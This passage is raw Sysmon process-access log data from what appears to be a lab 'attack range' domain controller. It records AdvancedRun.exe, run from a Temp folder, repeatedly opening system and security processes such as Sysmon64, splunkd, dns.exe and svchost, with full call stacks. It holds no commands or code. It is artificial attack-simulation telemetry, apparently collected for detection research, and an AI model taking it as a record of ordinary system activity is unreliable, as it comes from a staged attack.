20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069013Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069012Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.373{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069010Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.372{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069009Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.372{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.372{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.372{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069006Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.368{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.368{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.368{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.368{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069002Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004069001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun